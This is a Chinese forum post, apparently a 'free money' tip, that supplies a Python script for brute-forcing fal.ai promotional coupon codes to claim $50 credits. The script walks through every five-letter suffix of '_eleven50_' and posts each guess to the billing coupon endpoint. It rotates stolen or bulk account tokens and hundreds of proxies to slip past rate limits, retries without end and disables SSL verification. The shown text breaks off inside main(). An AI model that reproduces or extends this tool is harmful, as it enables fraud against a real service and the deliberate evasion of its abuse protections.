|
想刷fal 50美刀吗?我再教一次,极致速度
福利羊毛
保存为main.py
import asyncio
import configparser
import logging
import os
import signal
import string
import time
from datetime import datetime
from typing import Any, Dict, List, Optional, Set
import httpx
from proxy import get_proxy_url
# 配置日志
def setup_logging(level=logging.WARNING):
"""设置日志配置"""
logging.basicConfig(
level=level,
format="%(asctime)s - %(levelname)s - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
# 减少第三方库的日志输出
logging.getLogger("httpx").setLevel(logging.ERROR)
logging.getLogger("httpcore").setLevel(logging.ERROR)
return logging.getLogger("coupon_tester")
logger = setup_logging()
class Config:
"""配置管理器,从INI文件读取配置"""
def __init__(self, config_file: str = "config.ini"):
self.config = configparser.ConfigParser()
self.config_file = config_file
self.load_config()
def load_config(self):
"""加载配置文件"""
if not os.path.exists(self.config_file):
self.create_default_config()
self.config.read(self.config_file)
def create_default_config(self):
"""创建默认配置文件"""
config = configparser.ConfigParser()
# 基本设置
config["BASIC"] = {
"num_attempts": "100",
"max_workers": "10",
"delay": "0.2",
"suffix_length": "5",
"reverse_mode": "false",
"start_suffix": "",
"from_start": "false",
}
# 代理设置
config["PROXY"] = {
"proxies_per_token": "1",
"requests_per_proxy": "50",
"unlimited_proxies": "true",
"country": "",
"state": "",
"city": "",
}
# 令牌设置
config["TOKENS"] = {"token_file": "tokens.txt", "tokens": ""}
# 重试设置
config["RETRY"] = {
"max_retries": "3",
"retry_delay": "2.0",
"request_timeout": "30.0",
}
# 输出设置
config["OUTPUT"] = {
"output_dir": "results",
"invalid_file": "results/all_invalid_coupons.txt",
}
with open(self.config_file, "w") as f:
config.write(f)
logger.info(f"已创建默认配置文件: {self.config_file}")
def get_int(self, section: str, key: str, fallback: int = 0) -> int:
return self.config.getint(section, key, fallback=fallback)
def get_float(self, section: str, key: str, fallback: float = 0.0) -> float:
return self.config.getfloat(section, key, fallback=fallback)
def get_bool(self, section: str, key: str, fallback: bool = False) -> bool:
return self.config.getboolean(section, key, fallback=fallback)
def get_str(self, section: str, key: str, fallback: str = "") -> str:
return self.config.get(section, key, fallback=fallback)
class ProxyManager:
"""代理管理器 - 直接创建代理,不使用代理池"""
def __init__(
self,
country: Optional[str] = None,
state: Optional[str] = None,
city: Optional[str] = None,
):
self.country = country
self.state = state
self.city = city
self.proxy_cache: List[str] = []
self.cache_index = 0
self.lock = asyncio.Lock()
async def initialize(self, cache_size: int = 1000):
"""初始化 - 并发创建大量代理缓存以提高速度"""
logger.info(f"正在并发创建 {cache_size} 个代理...")
async def create_single_proxy() -> Optional[str]:
"""创建单个代理"""
try:
return get_proxy_url(
country=self.country, state=self.state, city=self.city
)
except Exception:
return None
# 并发创建代理,分批处理
batch_size = 100
for batch_start in range(0, cache_size, batch_size):
current_batch_size = min(batch_size, cache_size - batch_start)
# 创建任务
tasks = [create_single_proxy() for _ in range(current_batch_size)]
# 并发执行
results = await asyncio.gather(*tasks, return_exceptions=True)
# 收集成功的代理
for result in results:
if isinstance(result, str) and result:
self.proxy_cache.append(result)
logger.info(f"已创建 {len(self.proxy_cache)}/{cache_size} 个代理")
logger.info(f"代理管理器初始化完成 - 已缓存 {len(self.proxy_cache)} 个代理")
async def get_proxy_url(self) -> Optional[str]:
"""每次都获取新的代理URL - 无限制模式"""
# 如果缓存不为空,优先使用缓存,但不循环使用
if self.proxy_cache:
# 随机选择一个缓存的代理
import random
return random.choice(self.proxy_cache)
# 如果缓存为空或需要新代理,直接创建
try:
return get_proxy_url(country=self.country, state=self.state, city=self.city)
except Exception:
# 创建失败时,仍然尝试从缓存返回
if self.proxy_cache:
import random
return random.choice(self.proxy_cache)
return None
async def close_all(self):
"""清理 - 无需清理"""
pass
class TokenManager:
"""令牌管理器"""
def __init__(self, tokens: List[str]):
self.tokens = tokens
self.current_index = 0
self.token_usage = {token: 0 for token in tokens}
self.lock = asyncio.Lock()
async def get_token(self) -> str:
"""获取下一个令牌"""
async with self.lock:
token = self.tokens[self.current_index]
self.token_usage[token] += 1
self.current_index = (self.current_index + 1) % len(self.tokens)
return token
def get_stats(self) -> Dict[str, int]:
"""获取令牌使用统计"""
return self.token_usage.copy()
class SequentialSuffixGenerator:
"""按顺序生成指定长度的字符串"""
def __init__(self, length: int = 5, reverse: bool = False):
self.length = length
self.alphabet = string.ascii_lowercase
self.base = len(self.alphabet)
self.current_index = 0
self.reverse = reverse
if self.reverse:
self.current_index = self.base**self.length - 1
def _index_to_suffix(self, index: int) -> str:
"""将数字索引转换为对应的字符串后缀"""
if index < 0:
return ""
chars = []
temp_index = index
for _ in range(self.length):
chars.append(self.alphabet[temp_index % self.base])
temp_index //= self.base
return "".join(reversed(chars))
def generate_next_suffix(self) -> str:
"""生成下一个后缀"""
suffix = self._index_to_suffix(self.current_index)
if self.reverse:
self.current_index -= 1
else:
self.current_index += 1
return suffix
def start_from_suffix(self, suffix: str) -> None:
"""设置从指定后缀开始生成"""
if len(suffix) != self.length:
logger.warning(f"后缀长度不匹配: {suffix},期望长度: {self.length}")
return
# 计算后缀对应的索引
index = 0
for i, char in enumerate(suffix):
pos = self.alphabet.find(char)
index += pos * (self.base ** (self.length - i - 1))
self.current_index = index
logger.info(f"设置索引为: {index},对应后缀: {suffix}")
class CouponTester:
"""优惠券测试器 - 重新设计版本"""
def __init__(
self, config: Config, token_manager: TokenManager, proxy_manager: ProxyManager
):
self.config = config
self.token_manager = token_manager
self.proxy_manager = proxy_manager
self.request_timeout = config.get_float("RETRY", "request_timeout", 3.0)
# 任务管理
self.active_tasks: Set[asyncio.Task] = set()
self.max_active_tasks = config.get_int("BASIC", "max_workers", 1000)
self.task_semaphore = asyncio.Semaphore(self.max_active_tasks)
# 简化客户端管理
self.clients: List[httpx.AsyncClient] = []
self.client_index = 0
self.client_lock = asyncio.Lock()
async def initialize_clients(self, num_clients: int = 50):
"""初始化HTTP客户端池"""
logger.info(f"正在初始化 {num_clients} 个HTTP客户端...")
# 创建客户端
for i in range(num_clients):
proxy_url = await self.proxy_manager.get_proxy_url()
# 简化的连接设置
limits = httpx.Limits(
max_keepalive_connections=50,
max_connections=100,
keepalive_expiry=60.0, # 更长的保活时间,减少重连
)
client = httpx.AsyncClient(
timeout=httpx.Timeout(self.request_timeout),
proxy=proxy_url,
limits=limits,
http2=True,
verify=False, # 跳过SSL验证
)
self.clients.append(client)
logger.info(f"已初始化 {len(self.clients)} 个HTTP客户端")
async def get_client(self):
"""每次都创建新客户端使用不同代理 - 无限制模式"""
proxy_url = await self.proxy_manager.get_proxy_url()
# 每次都创建新客户端,确保使用不同代理
limits = httpx.Limits(
max_keepalive_connections=10,
max_connections=20,
keepalive_expiry=5.0, # 短期保活
)
client = httpx.AsyncClient(
timeout=httpx.Timeout(self.request_timeout),
proxy=proxy_url,
limits=limits,
http2=True,
verify=False,
)
return client
async def close_clients(self):
"""关闭所有客户端"""
for client in self.clients:
try:
await client.aclose()
except:
pass
self.clients.clear()
async def test_coupon(self, suffix: str, result_callback) -> None:
"""测试单个优惠券"""
async with self.task_semaphore:
await self._test_coupon_impl(suffix, result_callback)
async def _test_coupon_impl(self, suffix: str, result_callback):
"""测试优惠券的实际实现 - 无限重试直到成功"""
coupon_code = f"_eleven50_{suffix}"
url = f"https://rest.alpha.fal.ai/billing/coupon/{coupon_code}"
while True: # 无限重试,直到成功
client = None
try:
# 获取新的令牌和客户端
token = await self.token_manager.get_token()
client = await self.get_client()
headers = {
"accept": "application/json",
"authorization": f"Bearer {token}",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
}
# 发送请求
response = await client.post(url, headers=headers)
response_text = response.text
# 检查是否是速率限制或其他需要重试的错误
if (
"Rate limit exceeded" in response_text
or "timeout" in response_text.lower()
or "error" in response_text.lower()
or response.status_code >= 500
):
# 立即换代理和token重试,不延迟
continue
# 如果是正常响应,判断优惠券有效性
is_valid = not (
"Maximum number of claims exceeded" in response_text
or "not found" in response_text.lower()
or "Invalid" in response_text
or "Coupon has expired" in response_text
or "expired" in response_text.lower()
)
is_already_claimed = "User already claimed this coupon" in response_text
if is_already_claimed:
is_valid = False
# 成功获得有效响应,返回结果
await result_callback(
coupon_code, is_valid, response_text, is_already_claimed
)
return
except Exception:
# 任何异常都重试,无延迟
continue
finally:
# 确保关闭客户端
if client:
try:
await client.aclose()
except:
pass
class ResultCollector:
"""结果收集器"""
def __init__(self, config: Config):
self.config = config
self.valid_coupons: List[str] = []
self.invalid_coupons: List[str] = []
self.already_claimed_coupons: List[str] = []
self.processed_count = 0
self.total_count = 0
self.start_time = time.time()
self.lock = asyncio.Lock()
# 新增:用于速率计算的滑动窗口
self.recent_completions: List[float] = [] # 存储最近完成的时间戳
self.window_size = 20 # 滑动窗口大小
# 创建输出目录
output_dir = config.get_str("OUTPUT", "output_dir", "results")
os.makedirs(output_dir, exist_ok=True)
# 初始化文件
self._init_files()
def _init_files(self):
"""初始化输出文件"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
self.progress_file = "progress.txt"
self.response_log_file = "responses.log"
self.already_claimed_file = "using.txt"
output_dir = self.config.get_str("OUTPUT", "output_dir", "results")
self.valid_file = os.path.join(output_dir, f"valid_coupons_{timestamp}.txt")
self.invalid_file = os.path.join(output_dir, "all_invalid_coupons.txt")
# 创建或清空文件
with open(self.progress_file, "w") as f:
f.write(
f"优惠券测试进度报告 - 开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n\n"
)
with open(self.response_log_file, "w") as f:
f.write(
f"优惠券响应日志 - 开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n\n"
)
with open(self.already_claimed_file, "w") as f:
f.write(
f"已被使用的优惠券 - 开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n\n"
)
def set_total_count(self, total: int):
"""设置总数"""
self.total_count = total
async def collect_result(
self,
coupon_code: str,
is_valid: bool,
response_text: str,
is_already_claimed: bool,
):
"""收集结果(回调函数)"""
async with self.lock:
current_time = time.time()
self.processed_count += 1
# 记录完成时间到滑动窗口
self.recent_completions.append(current_time)
# 保持窗口大小
if len(self.recent_completions) > self.window_size:
self.recent_completions.pop(0)
# 记录响应日志
with open(self.response_log_file, "a") as f:
f.write(f"优惠券: {coupon_code}, 有效: {is_valid}\n")
f.write(f"响应内容: {response_text}\n")
if is_already_claimed:
f.write("状态: 已被使用\n")
elif is_valid:
f.write("状态: 有效\n")
else:
f.write("状态: 无效\n")
f.write("-" * 80 + "\n\n")
# 分类结果
if is_valid:
self.valid_coupons.append(coupon_code)
print(f"\n✅ 有效优惠券: {coupon_code}")
print(f"响应内容: {response_text}")
# 立即保存有效优惠券
with open(self.valid_file, "a") as f:
f.write(f"{coupon_code}\n")
elif is_already_claimed:
self.already_claimed_coupons.append(coupon_code)
with open(self.already_claimed_file, "a") as f:
f.write(f"{coupon_code}\n")
else:
self.invalid_coupons.append(coupon_code)
# 立即保存无效优惠券
with open(self.invalid_file, "a") as f:
f.write(f"{coupon_code}\n")
# 更新进度
self._update_progress(current_time)
def _update_progress(self, current_time: float):
"""更新进度显示"""
if self.total_count == 0:
return
elapsed = current_time - self.start_time
# 使用滑动窗口计算更准确的速率
if len(self.recent_completions) >= 2:
# 计算滑动窗口内的速率
window_start = self.recent_completions[0]
window_end = self.recent_completions[-1]
window_duration = window_end - window_start
if window_duration > 0:
# 窗口内的请求数 / 窗口时间 = 当前速率
rate = len(self.recent_completions) / window_duration
else:
# 如果窗口内时间太短,使用总体速率
rate = self.processed_count / elapsed if elapsed > 0 else 0
else:
# 如果样本不够,使用总体速率
rate = self.processed_count / elapsed if elapsed > 0 else 0
eta = (self.total_count - self.processed_count) / rate if rate > 0 else 0
percent = (self.processed_count / self.total_count) * 100
# 进度条
bar_length = 30
filled_length = int(bar_length * self.processed_count // self.total_count)
bar = "█" * filled_length + "-" * (bar_length - filled_length)
print()
status_line = (
f"进度: [{bar}] {percent:.1f}% ({self.processed_count}/{self.total_count}) | "
f"有效: {len(self.valid_coupons)} | 无效: {len(self.invalid_coupons)} | "
f"已使用: {len(self.already_claimed_coupons)} | "
f"速率: {rate:.2f}请求/秒 | "
f"已用时间: {self._format_time(elapsed)} | "
f"预计剩余: {self._format_time(eta)}"
)
print(status_line, end="")
def _format_time(self, seconds: float) -> str:
"""格式化时间"""
hours, remainder = divmod(int(seconds), 3600)
minutes, seconds = divmod(remainder, 60)
return (
f"{hours:02d}:{minutes:02d}:{seconds:02d}"
if hours > 0
else f"{minutes:02d}:{seconds:02d}"
)
def get_summary(self) -> Dict[str, Any]:
"""获取结果摘要"""
return {
"total_processed": self.processed_count,
"valid_count": len(self.valid_coupons),
"invalid_count": len(self.invalid_coupons),
"already_claimed_count": len(self.already_claimed_coupons),
"valid_coupons": self.valid_coupons,
"elapsed_time": time.time() - self.start_time,
}
def load_tokens_from_file(file_path: str) -> List[str]:
"""从文件加载认证令牌"""
if not file_path or not os.path.exists(file_path):
return []
tokens = []
try:
with open(file_path, "r") as f:
for line in f:
token = line.strip()
if token:
tokens.append(token)
logger.info(f"已从文件加载 {len(tokens)} 个认证令牌")
except Exception as e:
logger.error(f"加载认证令牌文件时出错: {str(e)}")
return tokens
def load_known_invalid_coupons(file_path: str) -> Set[str]:
"""加载已知的无效优惠券"""
if not os.path.exists(file_path):
logger.info(f"无效优惠券文件不存在: {file_path}")
return set()
invalid_coupons = set()
try:
with open(file_path, "r") as f:
for line in f:
coupon = line.strip()
if coupon:
if "_eleven50_" in coupon:
suffix = coupon.split("_eleven50_")[1]
invalid_coupons.add(suffix)
elif len(coupon) == 5 and coupon.isalpha() and coupon.islower():
invalid_coupons.add(coupon)
logger.info(f"已加载 {len(invalid_coupons)} 个已知无效优惠券")
except Exception as e:
logger.error(f"加载已知无效优惠券时出错: {str(e)}")
return invalid_coupons
async def main():
"""主函数"""
# 加载配置
config = Config()
# 加载令牌
tokens = []
token_file = config.get_str("TOKENS", "token_file", "tokens.txt")
if token_file:
tokens.extend(load_tokens_from_file(token_file))
# 从配置文件中的tokens字段加载
config_tokens = config.get_str("TOKENS", "tokens", "")
if config_tokens:
tokens.extend([t.strip() for t in config_tokens.split(",") if t.strip()])
if not tokens:
logger.error("未找到任何认证令牌,请在配置文件中设置token_file或tokens")
return
# 去重
tokens = list(set(tokens))
logger.info(f"加载了 {len(tokens)} 个唯一的认证令牌")
# 创建管理器
token_manager = TokenManager(tokens)
# 创建代理管理器
proxy_manager = ProxyManager(
|
|